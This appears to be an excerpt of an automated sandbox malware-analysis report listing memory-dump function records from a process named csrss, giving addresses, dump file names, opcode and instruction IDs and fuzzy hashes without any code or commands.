                                                      • Instruction Fuzzy Hash: 14F06D21E0D94A8FE685F76980993B9BAD1FF99748F5400B6C40CC32D3DF7868C58706
                                                      Function 00007FF848E9AD59 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9f33fe6cbb12aba266e521e513ca83560dfd035d417fd01baa8a55f56058dee
                                                      • Instruction ID: 6143e93645d54ca7bcd398063c426f1bb13e5548f075ae2fb87ffdba801275dd
                                                      • Opcode Fuzzy Hash: a9f33fe6cbb12aba266e521e513ca83560dfd035d417fd01baa8a55f56058dee
                                                      • Instruction Fuzzy Hash: A7F0EC31B0CBC44FC729553D54550617FF1DB5B51634903EFC096C76A3DD54AC868341
                                                      Function 00007FF848E73FBF Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c596817ae04a6199aea6a2a1df2da6125bce85b45c93552b815501dcf1dd0ff5
                                                      • Instruction ID: b8fed49d75b42a4f9c9ec24477c5e102d5ede7305ca77d598efd52969f80a655
                                                      • Opcode Fuzzy Hash: c596817ae04a6199aea6a2a1df2da6125bce85b45c93552b815501dcf1dd0ff5
                                                      • Instruction Fuzzy Hash: 7BF03270E0990F8FEB98EA48C855AFE77B0FB54351F00063AC01AD2284EF786A418B84
                                                      Function 00007FF848E62B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: 1eefac10af07d2f6764c7d5310106f9e712c5777091c62acccfbc6035f594056
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: A9F0E13094C85E8EEBB4FA14C8456E873A2FB91391F9446B5D40DF31A2DFB879818B48
                                                      Function 00007FF848E60B77 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77c885b3911e8bb667b258dc5efa66b8eef583e82c812ca42ca0f707244bfcc4
                                                      • Instruction ID: 47d914266f96cfb6da44dd35075882d88eb662c4aea8b793287e59a9cc795dae
                                                      • Opcode Fuzzy Hash: 77c885b3911e8bb667b258dc5efa66b8eef583e82c812ca42ca0f707244bfcc4
                                                      • Instruction Fuzzy Hash: 1CF0E53925EA85DFD742AB3DC8A58D4BF60FF03104F9A01EAD089CB963C315685DCB41
                                                      Function 00007FF848E747C4 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction ID: 66eb19dda980de2539f7eeb938ae82c16127b13bfe86e8d1e042379045c94a82
                                                      • Opcode Fuzzy Hash: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction Fuzzy Hash: 24F03A30E1C5468EFA58BA1894806B93291FF54794F114575D85A932C7EF38A8524688
                                                      Function 00007FF848E79302 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction ID: a83428b990fd2e542995a4f4cf24e85f3fd32e66ef46288f28e9d3cdadcad013
                                                      • Opcode Fuzzy Hash: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction Fuzzy Hash: 7DE01531A189098FEB94FB68D4456EC73A1FF49250F5400B6D00ED7292CA35A8118B44
                                                      Function 00007FF848E93459 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97f9cefa6724043385a380c204e3bf859677991a0d0975ec2fc455f9ae180146
                                                      • Instruction ID: 1cb5ddb4e150951ad8ec1e1b42a13cb8b96e67d87835a2c8291b5281b30c714f
                                                      • Opcode Fuzzy Hash: 97f9cefa6724043385a380c204e3bf859677991a0d0975ec2fc455f9ae180146
                                                      • Instruction Fuzzy Hash: 52E09220709BC84FC70EA6384868560BFF1EB6711178902DBC045CB2A3D919DC89C751
                                                      Function 00007FF848E9A8E9 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5587506607e5dc9eb59e78b2e127a7dcac5e062c9c7fbe92f42c1bfb5141e76
                                                      • Instruction ID: 7e3361eed1f5e917689d6ebe4feababae252d6803e662a37caff99b8361c71d9
                                                      • Opcode Fuzzy Hash: f5587506607e5dc9eb59e78b2e127a7dcac5e062c9c7fbe92f42c1bfb5141e76
                                                      • Instruction Fuzzy Hash: 08E09230609B844FC70AA6288869520BBA1EF6710178A42EBC005CB1A3DA19DC88C741
                                                      Function 00007FF848E9A859 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b136de9c4465a74ecae7d2a0b8f5d324c7a29daa162e4e8b69b99a9edac0b1f
                                                      • Instruction ID: bd8b58859d4076fb609418eb0e9cef636a281979e56b0bc043ec5559406b2354
                                                      • Opcode Fuzzy Hash: 7b136de9c4465a74ecae7d2a0b8f5d324c7a29daa162e4e8b69b99a9edac0b1f
                                                      • Instruction Fuzzy Hash: 64E09230609B844FC70AA6288869520BBF1EF6A10178A42EBC005CB1A3DA19DC89C741
                                                      Function 00007FF848E97C44 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 41b843d69ce4f94b581e4b1f3b2a638292c722eff2822de5ab3fa66263af7517
                                                      • Instruction ID: 3b790c5fedc380422d55cfe9582ec60f94e04ec5b7558383d10eaca055c29755
                                                      • Opcode Fuzzy Hash: 41b843d69ce4f94b581e4b1f3b2a638292c722eff2822de5ab3fa66263af7517
                                                      • Instruction Fuzzy Hash: 80E04F34A8E7C04FC70AA73888A58943FB0EF57211B4A80EBD045CB1B3D62D9C4EC752
                                                      Function 00007FF848E75178 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction ID: f0eaa999ca639210b5d73d02576f434c97bcc5544c67bc28b3caa325ed600902
                                                      • Opcode Fuzzy Hash: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction Fuzzy Hash: 02D05E30B6090D4B8B0CB62D8458434B3D1F7AA2167D452B9940BC3281ED25ECC68B84
                                                      Function 00007FF848E756D8 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33048c691754e2148c641c71409f8f72af6773d4cb460236c5ad15c8e747d6fc
                                                      • Instruction ID: 1c9d0777b38301961853d04fc2384ed9ec7c90b16b32325d11af83c31e6b319a
                                                      • Opcode Fuzzy Hash: 33048c691754e2148c641c71409f8f72af6773d4cb460236c5ad15c8e747d6fc
                                                      • Instruction Fuzzy Hash: 1CD0A730B6090D4B8B0CB63D8458534F3D1F7AA2167D4527CD40BC3281ED25ECC6CB84
                                                      Function 00007FF848E9D969 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e60a0f03738a7b0cc9e90fe60c45b8f9dc10e66583eb3621be1f16522b54ee65
                                                      • Instruction ID: 315b248e4b6228ec9ad315496e7f88821b5a010a995358705c2715075673ab8d
                                                      • Opcode Fuzzy Hash: e60a0f03738a7b0cc9e90fe60c45b8f9dc10e66583eb3621be1f16522b54ee65
                                                      • Instruction Fuzzy Hash: EDE0863164A7804FC30956288C698543BB1DF67111B5641DAC045CF673D61EDC89C701
                                                      Function 00007FF848E9D8E9 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d083797cc4c37f643a7e6df7e863d89c9124def3c79d8af5b12689d34e08bd9
                                                      • Instruction ID: 7c3d38eaf0a35be235a7287bcf9d0aab9b34bd2ebfd2bcbf713ab54be9d6b698
                                                      • Opcode Fuzzy Hash: 8d083797cc4c37f643a7e6df7e863d89c9124def3c79d8af5b12689d34e08bd9
                                                      • Instruction Fuzzy Hash: 79E04F3164A7804FC30A56288C698543BB19F67111B5A41DAC045CF6B3D61ADC88C702
                                                      Function 00007FF848E73A10 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                      Function 00007FF848E9A900 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E9A870 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E63824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: 0ebb8008c8aa52596a5baca2a055c8ed622b73bcf0a29714cd5fd3f58db3e768
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: B0E01224D0C11A4FF755F614C8517BD6261BF94340F5400B4D52DB36D2CF787D804749
                                                      Function 00007FF848E9D029 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bf13e036f4edc9b53d0d0af8e3e61debb82d912effd663b3793d36e5be8d87e
                                                      • Instruction ID: fd5e002d15d490e9fc1417daa2cbb9a4321dfeb680e7be21b7b08ebdf7e14038
                                                      • Opcode Fuzzy Hash: 2bf13e036f4edc9b53d0d0af8e3e61debb82d912effd663b3793d36e5be8d87e
                                                      • Instruction Fuzzy Hash: 59E0123150A7854FC30A9B28C8A99547FB0EF27211B9701D7C005CF573D61DDC99C751
                                                      Function 00007FF848E92290 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Function 00007FF848E971D0 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 604417b3b3542cd8c60929ed4a2d5b0b4ca1cb7ae624cf3b0c4c760a0363f089
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 97D01234B549054FC70CBA388C99C747391EB6E216B9540A9D00AD73B5DA6ADC89C741
                                                      Function 00007FF848E9BB50 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: 11a9089a325351e74b09ddd1052655bbc03aa67a49e6dbc6211aa68b6dca963e
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: BED01234B549084FC70CB738D85987473A1EB6A216B9540A9D00AC72B1DAAADC89C741
                                                      Function 00007FF848E992CA Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cf08b807beb86177fe26698fcde08e7472f0c944b41054036d67487a8be95b2
                                                      • Instruction ID: 307375f2f39e48a3ce7c2fd4ed40096ef78becb920e82222f69354ac1956991e
                                                      • Opcode Fuzzy Hash: 4cf08b807beb86177fe26698fcde08e7472f0c944b41054036d67487a8be95b2
                                                      • Instruction Fuzzy Hash: 22C08C305118088FC70CFB2CC89DD60B3E0FB2A201F9200A8D40ECB531EB6A9DE8CB81
                                                      Function 00007FF848E61953 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b4911254ed6ccf8ddc1f6681f750fc35decf834ec54729328e2f0adad0e8eaa
                                                      • Instruction ID: 1507d3cc8e9d49a6ddfb38906baf4ffed1bc978b45e643fab75c2f326847000e
                                                      • Opcode Fuzzy Hash: 4b4911254ed6ccf8ddc1f6681f750fc35decf834ec54729328e2f0adad0e8eaa
                                                      • Instruction Fuzzy Hash: EDD05E21E2CB594EEB42B370841A2FD52A2BF14350F8804B8D44EB71D3CF7D34005A88
                                                      Function 00007FF848E606AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: b243ce1c8409a49d89244fcce7777f365d9495397e16b6a7a0611b65a11a5de0
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 4CC08C00D1F52B08E445312F14020ACA2007FC46A4FD00032C01C70092AEAD30C5024E
                                                      Function 00007FF848E6559A Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 3733c24adb4382d9a53a210685dc36ebdcbea8b66b98e3371b2b595405a3d5ea
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: 48D0C92AC1D5238FFA72305448241BD0255BBA03B5FA947B2D83D3A1D5AF7DBD41861A
                                                      Function 00007FF848E612D8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: df46ae11a4307f9da4f694c293df9133eccd3b9680619939cdf0be34c2d8d1d6
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: 79C08C309108088FC908FB28C88480837A0FB09200BC20090E008C7170D229ECE0C740
                                                      Function 00007FF848E64E07 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d7aba2d6da692230352c6606e60930ef551249b58ed7a89083c9f9ac598423b
                                                      • Instruction ID: 7cd50fd0b9f34b2f1da173e9dc5147b5e31b38752dafe721a8d374b0ae82cb85
                                                      • Opcode Fuzzy Hash: 1d7aba2d6da692230352c6606e60930ef551249b58ed7a89083c9f9ac598423b
                                                      • Instruction Fuzzy Hash: 06C08C06E0EC169AF25A220480221BE44029F80784F8400B5E01E863CADF0C2E0142CA
                                                      Function 00007FF848E606D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: c48ea8f83d4bdf98d42c17b782ee6a8e6d6751725dcda34e9f4d2d08d944673f
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: E4B01200C6E40F04E408317B084206470407FC4144FC00070D40C70182AA9D3094034A

                                                      Non-executed Functions

                                                      Function 00007FF848E609B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: cf79c5b567ccb859426320fc966103f1301b8e5d9946be8043e9b4061092b02d
                                                      • Instruction ID: 044a3ba0cf1e019f55236ba56aa21ddff844068ee5ed982584dabd1b33190a10
                                                      • Opcode Fuzzy Hash: cf79c5b567ccb859426320fc966103f1301b8e5d9946be8043e9b4061092b02d
                                                      • Instruction Fuzzy Hash: 50516ADBADE9637DE21D32BDB0011F96B44EF812B9F4C9677E14C890834E18648686FD